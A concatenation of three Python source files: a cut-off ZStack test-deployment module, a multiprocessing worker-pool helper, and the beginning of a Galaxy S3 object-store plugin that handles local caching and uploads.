% self.node_ip)()
shell.ShellCmd("docker rmi %s || true" % self.node_ip)()
class Plan(object):
def _full_path(self, path):
if path.startswith('~'):
return os.path.expanduser(path)
elif path.startswith('/'):
return path
else:
return os.path.join(self.plan_base_path, path)
def _set_and_validate_config(self):
basic_config = self.config.basicConfig
deploy_config = self.config.deployerConfig
self.zstack_pkg = self._full_path(basic_config.zstackPkg.text_)
self.zstack_install_script = \
self._full_path(basic_config.zstackInstallScript.text_)
if not os.path.exists(self.zstack_pkg):
raise ActionError('unable to find %s for ZStack binary' \
% self.zstack_pkg)
if basic_config.hasattr('zstackInstallPath'):
self.install_path = \
self._full_path(basic_config.zstackInstallPath.text_)
else:
raise ActionError(\
'need to set config.deployerConfig.zstackInstallPath in : %s' % self.deploy_config_path)
#set ZSTACK_HOME, which will be used by zstack-ctl
os.environ['ZSTACK_HOME'] = '%s/apache-tomcat/webapps/zstack/' % \
self.install_path
if basic_config.hasattr('testAgent'):
self.test_agent_path = self._full_path(basic_config.testAgent.text_)
linux.error_if_path_missing(self.test_agent_path)
for zone in deploy_config.zones.get_child_node_as_list('zone'):
for cluster in zone.clusters.get_child_node_as_list('cluster'):
if cluster.hypervisorType_ == inventory.KVM_HYPERVISOR_TYPE:
for h in cluster.hosts.get_child_node_as_list('host'):
h.managementIp_
h.username_
h.password_
# will raise exception if one of above not specified in xml filea.
self.test_agent_hosts.append(h)
else:
if xmlobject.has_element(basic_config, 'testAgentHost'):
raise ActionError('<tesgAgent> is missing while <testAgentHost> presents')
self.catalina_home = self.install_path + '/apache-tomcat'
self.wait_for_start_timeout = basic_config.get('managementServerStartTimeout')
if not self.wait_for_start_timeout:
self.wait_for_start_timeout = 120
else:
self.wait_for_start_timeout = int(self.wait_for_start_timeout)
if hasattr(basic_config, 'rabbitmq'):
self.rabbitmq_server = basic_config.rabbitmq.get('server', 'localhost')
self.rabbitmq_server_root_passwd = basic_config.rabbitmq.get('password', '')
if not self.rabbitmq_server_root_passwd:
print ('!!!WARN! Rabbitmq server root password are not set!')
else:
raise ActionError('need to set config.basicConfig.rabbitmq.server in: %s' % self.deploy_config_path)
if hasattr(basic_config, 'db'):
self.need_deploy_db = True
self.db_server = basic_config.db.get('server', 'localhost')
self.db_username = basic_config.db.get('username', 'zstack')
self.db_password = basic_config.db.get('password', '')
self.db_admin_username = basic_config.db.get('admin', 'root')
self.db_admin_password = basic_config.db.get('adminPassword', '')
self.db_server_root_password = basic_config.db.get('server_root_password', '')
if not self.db_server_root_password:
print ('!!!WARN! Database server root password are not set!')
self.db_port = basic_config.db.get('port', '3306')
if basic_config.has_element('zstackProperties'):
if basic_config.zstackProperties.text_:
self.zstack_properties = self._full_path(basic_config.zstackProperties.text_)
if not os.path.exists(self.zstack_properties):
print('unable to find zstackProperties at %s, use \
default one' % self.zstack_properties)
self.zstack_properties = None
os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = ''
if deploy_config.has_element('nodes') \
and deploy_config.nodes.has_element('node'):
for node in deploy_config.nodes.get_child_node_as_list('node'):
node.ip_
self.nodes.append(node)
if linux.is_ip_existing(node.ip_):
os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = node.ip_
elif not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
os.environ['ZSTACK_BUILT_IN_HTTP_SERVER_IP'] = node.ip_
else:
raise ActionError('deploy.xml setting error. No deployerConfig.nodes.node is found. ')
if not os.environ.get('ZSTACK_BUILT_IN_HTTP_SERVER_IP'):
raise ActionError('deploy.xml setting error. No deployerConfig.nodes.node.ip is defined. ')
def _deploy_zstack_properties(self):
if not self.zstack_properties:
return
dst = os.path.join(self.catalina_home, \
'webapps/zstack/WEB-INF/classes/zstack.properties')
shell.call('cp -f %s %s' % (self.zstack_properties, dst))
print('deployed zstack properties[%s] to %s' % \
(self.zstack_properties, dst))
def _extra_deployment(self):
if not os.path.exists(EXTRA_DEPLOY_SCRIPT):
return
shell.call('%s %s' % (EXTRA_DEPLOY_SCRIPT, self.catalina_home))
print('Extra deployment by %s' % EXTRA_DEPLOY_SCRIPT)
def _upgrade_local_zstack(self):
#cmd = 'WEBSITE=localhost bash %s -f %s -u -r %s' % \
# (self.zstack_install_script, self.zstack_pkg, \
# self.install_path)
#if not add -F, will break db upgrade, since we stop_node by force.
cmd = 'bash %s -u -F' % self.zstack_pkg
shell.call(cmd)
self._extra_deployment()
def _install_local_zstack(self):
shell.call('rm -rf %s' % self.install_path, False)
#cmd = 'WEBSITE=localhost bash %s -f %s -r %s -a -z' % \
# (self.zstack_install_script, self.zstack_pkg, \
# self.install_path)
#cmd = 'bash %s -D -z -r %s -m -R aliyun' % (self.zstack_pkg, self.install_path)
cmd = 'bash %s -D -z -r %s -R aliyun' % (self.zstack_pkg, self.install_path)
if self.db_admin_password:
cmd = '%s -P %s' % (cmd, self.db_admin_password)
if self.db_password:
cmd = '%s -p %s' % (cmd, self.db_password)
shell.call(cmd)
#self._deploy_zstack_properties()
self._extra_deployment()
def _set_extra_node_config(self):
for node in self.nodes:
cmd = 'zstack-ctl configure --duplicate-to-remote=%s; zstack-ctl configure --host=%s management.server.ip=%s' % \
(node.ip_, node.ip_, node.ip_)
thread = threading.Thread(target=shell_cmd_thread, args=(cmd,))
thread.start()
self._wait_for_thread_completion('set extra management node config', 10)
def _wait_for_thread_completion(self, msg, wait_time, raise_exception = True):
end_time = wait_time
while end_time > 0:
if threading.active_count() == 1:
break
if node_exception and raise_exception:
print 'Meet exception when: %s :' % msg
info1 = node_exception[0][1]
info2 = node_exception[0][2]
raise info1, None, info2
print 'Wait for %s ...' % msg
time.sleep(1)
end_time -= 1
else:
raise ActionError('%s failed, since it exceeds %s seconds' % \
(msg, wait_time))
def _install_management_nodes(self):
for node in self.nodes:
if not linux.is_ip_existing(node.ip_):
cmd = 'zstack-ctl install_management_node --force-reinstall \
--host=%s' % node.ip_
thread = threading.Thread(target=shell_cmd_thread, args=(cmd,))
thread.start()
else:
print "node: %s has been installed zstack" % node.ip_
self._wait_for_thread_completion('install remote management node', 600)
def _upgrade_management_nodes(self):
for node in self.nodes:
if not linux.is_ip_existing(node.ip_):
cmd = 'zstack-ctl upgrade_management_node --host=%s' % node.ip_
thread = threading.Thread(target=shell_cmd_thread, args=(cmd,))
thread.start()
self._wait_for_thread_completion('upgrade remote management node', 600)
def _start_war(self):
self.tomcat.start()
def _deploy_rabbitmq(self):
ssh.make_ssh_no_password(self.rabbitmq_server, 'root', \
self.rabbitmq_server_root_passwd)
cmd = "zstack-ctl install_rabbitmq --host=%s" % self.rabbitmq_server
print('deploying rabbitmq ...')
shell.call(cmd)
def _deploy_db(self, keep_db = False):
if not keep_db:
extra_opts = '--drop'
else:
extra_opts = '--keep-db'
if not self.need_deploy_db:
return
ssh.make_ssh_no_password(self.db_server, 'root', \
self.db_server_root_password)
if not self.db_admin_password:
cmd = 'zstack-ctl install_db --host=%s --login-password=zstack.mysql.password' % self.db_server
else:
cmd = 'zstack-ctl install_db --host=%s \
--login-password=%s' \
% (self.db_server, \
self.db_admin_password)
print('installing db ...')
shell.call(cmd)
cmd = 'zstack-ctl deploydb %s --host=%s' % (extra_opts, self.db_server)
if self.db_admin_password:
cmd = '%s --root-password=%s' % (cmd, self.db_admin_password )
else:
cmd = '%s --root-password=zstack.mysql.password' % cmd
if self.db_password:
cmd = '%s --zstack-password=%s' % (cmd, self.db_password)
print('deploying db ...')
shell.call(cmd)
@lock.file_lock('deploy_test_agent')
def deploy_test_agent(self, target=None):
print('Deploy test agent\n')
if not self.test_agent_path:
print('Not find test_agent. Stop deploying test agent.\n')
return
testagentdir = None
try:
def untar_test_agent():
tmpdir = tempfile.mkdtemp()
shell.call('tar jxf %s -C %s' % (self.test_agent_path, tmpdir))
shell.call('cd %s/zstacktestagent/; tar jcf pypi.tar.bz pypi' \
% tmpdir)
return '%s/zstacktestagent' % tmpdir
def _wait_echo(target_ip):
try:
rspstr = http.json_dump_post(testagent.build_http_path(target_ip, host_plugin.ECHO_PATH))
except:
print('zstack-testagent does not startup, will try again ...')
return False
return True
testagentdir = untar_test_agent()
ansible.check_and_install_ansible()
lib_files = ['testagent/zstacktestagent-1.0.0.tar.gz', \
'testagent/zstacklib-1.0.0.tar.gz' ]
if not target:
#default will deploy all test hosts.
exc_info = []
for h in self.test_agent_hosts:
print('Deploy test agent in host: [%s] \n' % h.managementIp_)
ansible_cmd_args = "host=%s \
pkg_testagent=zstacktestagent-1.0.0.tar.gz \
pkg_zstacklib=zstacklib-1.0.tar.gz \
pypi_source_tar=pypi.tar.bz" % \
h.managementIp_
if ENV_HTTP_PROXY:
ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
(ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
ansible_cmd = "testagent.yaml -e '%s'" % ansible_cmd_args
thread = threading.Thread(target=ansible.execute_ansible,\
args=(h.managementIp_, h.username_, h.password_,\
testagentdir, ansible_cmd, lib_files, exc_info))
# Wrap up old zstack logs in /var/log/zstack/
print('archive test log on host: [%s] \n' % h.managementIp_)
try:
log.cleanup_log(h.managementIp_, h.username_, h.password_)
except Exception as e:
print "clean up old testing logs meet execption on management node: %s" % h.managementIp_
raise e
thread.start()
#if localhost is not in hosts, should do log archive for zstack
log.cleanup_local_log()
self._wait_for_thread_completion('install test agent', 200)
for h in self.test_agent_hosts:
if not linux.wait_callback_success(_wait_echo, h.managementIp_, 5, 0.2, True):
raise ActionError('testagent is not start up in 5s on %s, after it is deployed by ansible.' % h.managementIp_)
else:
print('Deploy test agent in host: %s \n' % target.managementIp)
ansible_cmd_args = "host=%s \
pkg_testagent=zstacktestagent-1.0.0.tar.gz \
pkg_zstacklib=zstacklib-1.0.tar.gz \
pypi_source_tar=pypi.tar.bz" % \
target.managementIp
if ENV_HTTP_PROXY:
ansible_cmd_args = "%s http_proxy=%s https_proxy=%s" % \
(ansible_cmd_args, ENV_HTTP_PROXY, ENV_HTTPS_PROXY)
ansible_cmd = "testagent.yaml -e '%s'" % ansible_cmd_args
ansible.execute_ansible(target.managementIp, target.username, \
target.password, testagentdir, ansible_cmd, lib_files)
if not linux.wait_callback_success(_wait_echo, target.managementIp, 5, 0.2):
raise ActionError('testagent is not start up in 5s on %s, after it is deployed by ansible.' % target.managementIp)
finally:
if testagentdir:
shell.call('rm -rf %s' % testagentdir)
def execute_plan_without_deploy_test_agent(self):
try:
self._stop_nodes()
shell.call('zstack-ctl kairosdb --stop')
shell.call('zstack-ctl cassandra --stop')
except:
pass
self._install_local_zstack()
self._deploy_db()
self._deploy_rabbitmq()
self._install_management_nodes()
self._set_extra_node_config()
self._start_multi_nodes(restart=True)
def deploy_db_without_reinstall_zstack(self):
self.deploy_test_agent()
self._stop_nodes()
self._deploy_db()
self._start_multi_nodes()
def restart_war_on_all_nodes(self):
#planed_nodes = []
#for node in self.nodes:
# planed_nodes.append(node.ip_)
#import socket
#planed_nodes.append(socket.gethostbyname(socket.gethostname()))
#live_nodes_inv = res_ops.query_resource(res_ops.MANAGEMENT_NODE, [])
#set ZSTACK_HOME, which will be used by zstack-ctl
os.environ['ZSTACK_HOME'] = '%s/apache-tomcat/webapps/zstack/' % \
self.install_path
not_restarted_nodes = []
#for live_node_inv in live_nodes_inv:
# if not live_node_inv.hostName in planed_nodes:
# not_restarted_nodes.append(live_node_inv.hostName)
self.deploy_test_agent()
self._stop_nodes()
self._upgrade_local_zstack()
#self._deploy_db(keep_db = True)
self._upgrade_management_nodes()
self._set_extra_node_config()
self._start_multi_nodes()
if not_restarted_nodes:
print('Following node are not restarted, since they are not defined in deploy.xml : %s' % not_restarted_nodes)
else:
nodes_ip = ''
for node in self.nodes:
nodes_ip = '%s %s' % (nodes_ip, node.ip__)
print('\nAll nodes:%s have been restarted!\n' % nodes_ip)
def execute_plan(self):
self.deploy_test_agent()
self.execute_plan_without_deploy_test_agent()
def _start_multi_nodes(self, restart = False):
nodes = []
threads = []
for node in self.nodes:
#The reserved node is used by test cases.
if not restart and node.reserve__:
continue
if not node.dockerImage__:
print 'Deploy node in hosts'
#consider some zstack-server is running in vm, the server
# startup speed is slow. Increase timeout to 180s.
cmd = 'zstack-ctl stop_node --host=%s ; zstack-ctl start_node --host=%s --timeout=180' % (node.ip_, node.ip_)
thread = threading.Thread(target=shell_cmd_thread, args=(cmd, True, ))
threads.append(thread)
else:
print 'Deploy node in docker'
docker_node = DockerNode(self)
docker_node.set_docker_image(node.dockerImage__)
docker_node.set_node_ip(node.ip__)
docker_node.prepare_node()
nodes.append(docker_node)
thread = threading.Thread(target=docker_node.start_node)
threads.append(thread)
for thread in threads:
thread.start()
self._wait_for_thread_completion('start management node', 200)
if node_exception:
print 'node start meets exception:'
info1 = node_exception[0][1]
info2 = node_exception[0][2]
raise info1, None, info2
current_time = time.time()
#largest timeout time for multi nodes startup is 300s
timeout_time = current_time + 300
for node in self.nodes:
#The reserved node is used by test cases.
if node.reserve__:
continue
new_time = time.time()
if new_time >= timeout_time:
new_timeout = 1
else:
new_timeout = timeout_time - new_time
if not linux.wait_callback_success(\
node_ops.is_management_node_start, \
node.ip_, timeout=new_timeout, interval=0.5):
raise ActionError('multi node does not startup on host: %s' \
% node.ip_)
zstack_home = '%s/apache-tomcat/webapps/zstack/' % self.install_path
cmd = 'zstack-ctl setenv ZSTACK_HOME=%s' % zstack_home
shell.call(cmd)
def stop_node(self):
print 'Begin to stop node ...'
self._stop_nodes()
def _stop_nodes(self):
nodes = []
for node in self.nodes:
if node.dockerImage__:
docker_node = DockerNode(self)
docker_node.set_node_ip(node.ip__)
nodes.append(docker_node)
thread = threading.Thread(target=docker_node.stop_node)
thread.start()
docker_node.cleanup()
else:
#Woodpecker need to set no ssh password for all nodes.
cmd = 'zstack-ctl stop_node --host=%s -f' % node.ip_
thread = threading.Thread(target=shell_cmd_thread, args=(cmd, True))
thread.start()
self._wait_for_thread_completion('stop management node', 40, \
raise_exception = False)
def disable_db_deployment(self):
self.need_deploy_db = False
def __init__(self, plan_config):
self.config = plan_config
self.zstack_pkg = None
self.zstack_install_script = None
self.install_path = None
self.test_agent_path = None
self.test_agent_hosts = []
self.nodes = []
self.catalina_home = None
self.tomcat = None
#self.elasticsearch_home = None
#self.recreate_elasticsearch_index = False
self.wait_for_start_timeout = None
self.deploy_config_path = plan_config.deployConfigPath_
self.deploy_config_tmpt_path = plan_config.deployConfigTemplatePath__
self.plan_base_path = os.path.dirname(plan_config.deployConfigPath_)
self.need_deploy_db = False
self.rabbitmq_server = 'localhost'
#default db information
self.db_server = 'localhost'
self.db_username = 'zstack'
self.db_password = ''
self.db_port = '3306'
self.zstack_properties = None
self.wait_for_deploy_testagent_timeout = 300
self._set_and_validate_config()
class SetupAction(object):
def __init__(self):
self.plan = None
self.out = None
def run(self):
p = Plan(self.plan)
p.execute_plan()
return p
|
pwork.py | from multiprocessing import Process, Queue
import time
try:
from Queue import Empty
except ImportError:
from queue import Empty
import logging
import six
class Stop(object):
pass
STOP = Stop()
class Worker(Process):
def __init__(self, callback, taskq, resultq, ignore_exceptions, *args, **kwargs):
self.callback = callback
self.taskq = taskq
self.resultq = resultq
self.ignore_exceptions = ignore_exceptions
Process.__init__(self, *args, **kwargs)
def run(self):
while True:
task = self.taskq.get()
if isinstance(task, Stop):
return
else:
try:
res = self.callback(task)
self.resultq.put(res)
except Exception as ex:
if self.ignore_exceptions:
logging.error('', exc_info=ex)
else:
raise
def make_work(callback, tasks, limit, ignore_exceptions=True,
taskq_size=50):
"""
Run up to "limit" processes, do tasks and yield results.
:param callback: the function that will process single task
:param tasks: the sequence or iterator or queue of tasks, each task
in turn is sequence of arguments, if task is just signle argument
it should be wrapped into list or tuple
:param limit: the maximum number of processes
"""
# If tasks is number convert it to the list of number
if isinstance(tasks, int):
tasks = six.moves.range(tasks)
# Ensure that tasks sequence is iterator
tasks = iter(tasks)
taskq = Queue(taskq_size)
# Here results of task processing will be saved
resultq = Queue()
# Prepare and run up to "limit" processes
processes = []
for x in six.moves.range(limit):
process = Worker(callback, taskq, resultq, ignore_exceptions)
process.daemon = True
process.start()
processes.append(process)
# Put tasks from tasks iterator to taskq queue
# until tasks iterator ends
# Do it in separate process
def task_processor(task_iter, task_queue, limit):
try:
for task in task_iter:
task_queue.put(task)
finally:
for x in six.moves.range(limit):
task_queue.put(STOP)
processor = Process(target=task_processor, args=[tasks, taskq, limit])
processor.daemon = True
processor.start()
while True:
try:
yield resultq.get(True, 0.2)
except Empty:
pass
if not any(x.is_alive() for x in processes):
break
while True:
try:
yield resultq.get(False)
except Empty:
break
if __name__ == '__main__':
"""
Usage example
"""
from multiprocessing import current_process
import logging
from random import random
import time
def worker(arg):
logging.debug('Processing %s' % arg)
time.sleep(random())
return current_process().name, arg
def tasks():
for x in six.moves.range(3):
logging.debug('Generating task #%d' % x)
time.sleep(random())
yield (x,)
def main():
for res in make_work(worker, tasks(), 2):
logging.debug('Result %s received from process %s' % (res[1], res[0]))
if __name__ == '__main__':
logging.basicConfig(level=logging.DEBUG, format='%(processName)s %(message)s')
main()
|
s3.py | """
Object Store plugin for the Amazon Simple Storage Service (S3)
"""
import logging
import multiprocessing
import os
import shutil
import subprocess
import threading
import time
from datetime import datetime
from galaxy.exceptions import ObjectInvalid, ObjectNotFound
from galaxy.util import (
directory_hash_id,
safe_relpath,
string_as_bool,
umask_fix_perms,
which,
)
from galaxy.util.sleeper import Sleeper
from .s3_multipart_upload import multipart_upload
from ..objectstore import convert_bytes, ObjectStore
try:
# Imports are done this way to allow objectstore code to be used outside of Galaxy.
import boto
from boto.exception import S3ResponseError
from boto.s3.key import Key
from boto.s3.connection import S3Connection
except ImportError:
boto = None
NO_BOTO_ERROR_MESSAGE = ("S3/Swift object store configured, but no boto dependency available."
"Please install and properly configure boto or modify object store configuration.")
log = logging.getLogger(__name__)
logging.getLogger('boto').setLevel(logging.INFO) # Otherwise boto is quite noisy
class S3ObjectStore(ObjectStore):
"""
Object store that stores objects as items in an AWS S3 bucket. A local
cache exists that is used as an intermediate location for files between
Galaxy and S3.
"""
def __init__(self, config, config_xml):
if boto is None:
raise Exception(NO_BOTO_ERROR_MESSAGE)
super(S3ObjectStore, self).__init__(config)
self.staging_path = self.config.file_path
self.transfer_progress = 0
self._parse_config_xml(config_xml)
self._configure_connection()
self.bucket = self._get_bucket(self.bucket)
# Clean cache only if value is set in galaxy.ini
if self.cache_size != -1:
# Convert GBs to bytes for comparison
self.cache_size = self.cache_size * 1073741824
# Helper for interruptable sleep
self.sleeper = Sleeper()
self.cache_monitor_thread = threading.Thread(target=self.__cache_monitor)
self.cache_monitor_thread.start()
log.info("Cache cleaner manager started")
# Test if 'axel' is available for parallel download and pull the key into cache
if which('axel'):
self.use_axel = True
else:
self.use_axel = False
def _configure_connection(self):
log.debug("Configuring S3 Connection")
self.conn = S3Connection(self.access_key, self.secret_key)
def _parse_config_xml(self, config_xml):
try:
a_xml = config_xml.findall('auth')[0]
self.access_key = a_xml.get('access_key')
self.secret_key = a_xml.get('secret_key')
b_xml = config_xml.findall('bucket')[0]
self.bucket = b_xml.get('name')
self.use_rr = string_as_bool(b_xml.get('use_reduced_redundancy', "False"))
self.max_chunk_size = int(b_xml.get('max_chunk_size', 250))
cn_xml = config_xml.findall('connection')
if not cn_xml:
cn_xml = {}
else:
cn_xml = cn_xml[0]
self.host = cn_xml.get('host', None)
self.port = int(cn_xml.get('port', 6000))
self.multipart = string_as_bool(cn_xml.get('multipart', 'True'))
self.is_secure = string_as_bool(cn_xml.get('is_secure', 'True'))
self.conn_path = cn_xml.get('conn_path', '/')
c_xml = config_xml.findall('cache')[0]
self.cache_size = float(c_xml.get('size', -1))
self.staging_path = c_xml.get('path', self.config.object_store_cache_path)
for d_xml in config_xml.findall('extra_dir'):
self.extra_dirs[d_xml.get('type')] = d_xml.get('path')
log.debug("Object cache dir: %s", self.staging_path)
log.debug(" job work dir: %s", self.extra_dirs['job_work'])
# for multipart upload
self.s3server = {'access_key': self.access_key,
'secret_key': self.secret_key,
'is_secure': self.is_secure,
'max_chunk_size': self.max_chunk_size,
'host': self.host,
'port': self.port,
'use_rr': self.use_rr,
'conn_path': self.conn_path}
except Exception:
# Toss it back up after logging, we can't continue loading at this point.
log.exception("Malformed ObjectStore Configuration XML -- unable to continue")
raise
def __cache_monitor(self):
time.sleep(2) # Wait for things to load before starting the monitor
while self.running:
total_size = 0
# Is this going to be too expensive of an operation to be done frequently?
file_list = []
for dirpath, _, filenames in os.walk(self.staging_path):
for filename in filenames:
filepath = os.path.join(dirpath, filename)
file_size = os.path.getsize(filepath)
total_size += file_size
# Get the time given file was last accessed
last_access_time = time.localtime(os.stat(filepath)[7])
# Compose a tuple of the access time and the file path
file_tuple = last_access_time, filepath, file_size
file_list.append(file_tuple)
# Sort the file list (based on access time)
file_list.sort()
# Initiate cleaning once within 10% of the defined cache size?
cache_limit = self.cache_size * 0.9
if total_size > cache_limit:
log.info("Initiating cache cleaning: current cache size: %s; clean until smaller than: %s",
convert_bytes(total_size), convert_bytes(cache_limit))
# How much to delete? If simply deleting up to the cache-10% limit,
# is likely to be deleting frequently and may run the risk of hitting
# the limit - maybe delete additional #%?
# For now, delete enough to leave at least 10% of the total cache free
delete_this_much = total_size - cache_limit
self.__clean_cache(file_list, delete_this_much)
self.sleeper.sleep(30) # Test cache size every 30 seconds?
def __clean_cache(self, file_list, delete_this_much):
""" Keep deleting files from the file_list until the size of the deleted
files is greater than the value in delete_this_much parameter.
:type file_list: list
:param file_list: List of candidate files that can be deleted. This method
will start deleting files from the beginning of the list so the list
should be sorted accordingly. The list must contains 3-element tuples,
positioned as follows: position 0 holds file last accessed timestamp
(as time.struct_time), position 1 holds file path, and position 2 has
file size (e.g., (<access time>, /mnt/data/dataset_1.dat), 472394)
:type delete_this_much: int
:param delete_this_much: Total size of files, in bytes, that should be deleted.
"""
# Keep deleting datasets from file_list until deleted_amount does not
# exceed delete_this_much; start deleting from the front of the file list,
# which assumes the oldest files come first on the list.
deleted_amount = 0
for entry in file_list:
if deleted_amount < delete_this_much:
deleted_amount += entry[2]
os.remove(entry[1])
# Debugging code for printing deleted files' stats
# folder, file_name = os.path.split(f[1])
# file_date = time.strftime("%m/%d/%y %H:%M:%S", f[0])
# log.debug("%s. %-25s %s, size %s (deleted %s/%s)" \
# % (i, file_name, convert_bytes(f[2]), file_date, \
# convert_bytes(deleted_amount), convert_bytes(delete_this_much)))
else:
log.debug("Cache cleaning done. Total space freed: %s", convert_bytes(deleted_amount))
return
def _get_bucket(self, bucket_name):
""" Sometimes a handle to a bucket is not established right away so try
it a few times. Raise error is connection is not established. """
for i in range(5):
try:
bucket = self.conn.get_bucket(bucket_name)
log.debug("Using cloud object store with bucket '%s'", bucket.name)
return bucket
except S3ResponseError:
try:
log.debug("Bucket not found, creating s3 bucket with handle '%s'", bucket_name)
self.conn.create_bucket(bucket_name)
except S3ResponseError:
log.exception("Could not get bucket '%s', attempt %s/5", bucket_name, i + 1)
time.sleep(2)
# All the attempts have been exhausted and connection was not established,
# raise error
raise S3ResponseError
def _fix_permissions(self, rel_path):
""" Set permissions on rel_path"""
for basedir, _, files in os.walk(rel_path):
umask_fix_perms(basedir, self.config.umask, 0o777, self.config.gid)
for filename in files:
path = os.path.join(basedir, filename)
# Ignore symlinks
if os.path.islink(path):
continue
umask_fix_perms(path, self.config.umask, 0o666, self.config.gid)
def _construct_path(self, obj, base_dir=None, dir_only=None, extra_dir=None, extra_dir_at_root=False, alt_name=None, obj_dir=False, **kwargs):
# extra_dir should never be constructed from provided data but just
# make sure there are no shenannigans afoot
if extra_dir and extra_dir != os.path.normpath(extra_dir):
log.warning('extra_dir is not normalized: %s', extra_dir)
raise ObjectInvalid("The requested object is invalid")
# ensure that any parent directory references in alt_name would not
# result in a path not contained in the directory path constructed here
if alt_name:
if not safe_relpath(alt_name):
log.warning('alt_name would locate path outside dir: %s', alt_name)
raise ObjectInvalid("The requested object is invalid")
# alt_name can contain parent directory references, but S3 will not
# follow them, so if they are valid we normalize them out
alt_name = os.path.normpath(alt_name)
rel_path = os.path.join(*directory_hash_id(obj.id))
if extra_dir is not None:
if extra_dir_at_root:
rel_path = os.path.join(extra_dir, rel_path)
else:
rel_path = os.path.join(rel_path, extra_dir)
# for JOB_WORK directory
if obj_dir:
rel_path = os.path.join(rel_path, str(obj.id))
if base_dir:
base = self.extra_dirs.get(base_dir)
return os.path.join(base, rel_path)
# S3 folders are marked by having trailing '/' so add it now
rel_path = '%s/' % rel_path
if not dir_only:
rel_path = os.path.join(rel_path, alt_name if alt_name else "dataset_%s.dat" % obj.id)
return rel_path
def _get_cache_path(self, rel_path):
return os.path.abspath(os.path.join(self.staging_path, rel_path))
def _get_transfer_progress(self):
return self.transfer_progress
def _get_size_in_s3(self, rel_path):
try:
key = self.bucket.get_key(rel_path)
if key:
return key.size
except S3ResponseError:
log.exception("Could not get size of key '%s' from S3", rel_path)
return -1
def _key_exists(self, rel_path):
exists = False
try:
# A hackish way of testing if the rel_path is a folder vs a file
is_dir = rel_path[-1] == '/'
if is_dir:
keyresult = self.bucket.get_all_keys(prefix=rel_path)
if len(keyresult) > 0:
exists = True
else:
exists = False
else:
key = Key(self.bucket, rel_path)
exists = key.exists()
except S3ResponseError:
log.exception("Trouble checking existence of S3 key '%s'", rel_path)
return False
if rel_path[0] == '/':
raise
return exists
def _in_cache(self, rel_path):
""" Check if the given dataset is in the local cache and return True if so. """
# log.debug("------ Checking cache for rel_path %s" % rel_path)
cache_path = self._get_cache_path(rel_path)
return os.path.exists(cache_path)
# TODO: Part of checking if a file is in cache should be to ensure the
# size of the cached file matches that on S3. Once the upload tool explicitly
# creates, this check sould be implemented- in the mean time, it's not
# looking likely to be implementable reliably.
# if os.path.exists(cache_path):
# # print "***1 %s exists" % cache_path
# if self._key_exists(rel_path):
# # print "***2 %s exists in S3" % rel_path
# # Make sure the size in cache is available in its entirety
# # print "File '%s' cache size: %s, S3 size: %s" % (cache_path, os.path.getsize(cache_path), self._get_size_in_s3(rel_path))
# if os.path.getsize(cache_path) == self._get_size_in_s3(rel_path):
# # print "***2.1 %s exists in S3 and the size is the same as in cache (in_cache=True)" % rel_path
# exists = True
# else:
# # print "***2.2 %s exists but differs in size from cache (in_cache=False)" % cache_path
# exists = False
# else:
# # Although not perfect decision making, this most likely means
# # that the file is currently being uploaded
# # print "***3 %s found in cache but not in S3 (in_cache=True)" % cache_path
# exists = True
# else:
# return False
def _pull_into_cache(self, rel_path):
# Ensure the cache directory structure exists (e.g., dataset_#_files/)
rel_path_dir = os.path.dirname(rel_path)
if not os.path.exists(self._get_cache_path(rel_path_dir)):
os.makedirs(self._get_cache_path(rel_path_dir))
# Now pull in the file
file_ok = self._download(rel_path)
self._fix_permissions(self._get_cache_path(rel_path_dir))
return file_ok
def _transfer_cb(self, complete, total):
self.transfer_progress += 10
def _download(self, rel_path):
try:
log.debug("Pulling key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
key = self.bucket.get_key(rel_path)
# Test if cache is large enough to hold the new file
if self.cache_size > 0 and key.size > self.cache_size:
log.critical("File %s is larger (%s) than the cache size (%s). Cannot download.",
rel_path, key.size, self.cache_size)
return False
if self.use_axel:
log.debug("Parallel pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
ncores = multiprocessing.cpu_count()
url = key.generate_url(7200)
ret_code = subprocess.call(['axel', '-a', '-n', ncores, url])
if ret_code == 0:
return True
else:
log.debug("Pulled key '%s' into cache to %s", rel_path, self._get_cache_path(rel_path))
self.transfer_progress = 0 # Reset transfer progress counter
key.get_contents_to_filename(self._get_cache_path(rel_path), cb=self._transfer_cb, num_cb=10)
return True
except S3ResponseError:
log.exception("Problem downloading key '%s' from S3 bucket '%s'", rel_path, self.bucket.name)
return False
def _push_to_os(self, rel_path, source_file=None, from_string=None):
"""
Push the file pointed to by ``rel_path`` to the object store naming the key
``rel_path``. If ``source_file`` is provided, push that file instead while
still using ``rel_path`` as the key name.
If ``from_string`` is provided, set contents of the file to the value of
the string.
"""
try:
source_file = source_file if source_file else self._get_cache_path(rel_path)
if os.path.exists(source_file):
key = Key(self.bucket, rel_path)
if os.path.getsize(source_file) == 0 and key.exists():
log.debug("Wanted to push file '%s' to S3 key '%s' but its size is 0; skipping.", source_file, rel_path)
return True
if from_string:
key.set_contents_from_string(from_string, reduced_redundancy=self.use_rr)
log.debug("Pushed data from string '%s' to key '%s'", from_string, rel_path)
else:
start_time = datetime.now()
log.debug("Pushing cache file '%s' of size %s bytes to key '%s'", source_file, os.path.getsize(source_file), rel_path)
mb_size = os.path.getsize(source_file) / 1e6
if mb_size < 10 or (not self.multipart):
self.transfer_progress = 0 # Reset transfer progress counter
key.set_contents_from_filename(source_file,
reduced_redundancy=self.use_rr,
cb=self._transfer_cb,
num_cb=10)
else:
multipart_upload(self.s3server, self.bucket, key.name, source_file, mb_size)
end_time = datetime.now()
log.debug("Pushed cache file '%s' to key '%s' (%s bytes transfered in %s sec)",
source_file, rel_path, os.path.getsize(source_file), end_time - start_time)
return True
else:
log.error("Tried updating key '%s' from source file '%s', but source file does not exist.",
rel_path, source_file)
except S3ResponseError:
log.exception("Trouble pushing S3 key '%s' from file '%s'", rel_path, source_file)
return False
def file_ready(self, obj, **kwargs):
"""
A helper method that checks if a file corresponding to a dataset is
ready and available to be used. Return ``True`` if so, ``False`` otherwise.
"""
rel_path = self._construct_path(obj, **kwargs)
# Make sure the size in cache is available in its entirety
if self._in_cache(rel_path):
if os.path.getsize(self._get_cache_path(rel_path)) == self._get_size_in_s3(rel_path):
return True
log.debug("Waiting for dataset %s to transfer from OS: %s/%s", rel_path,
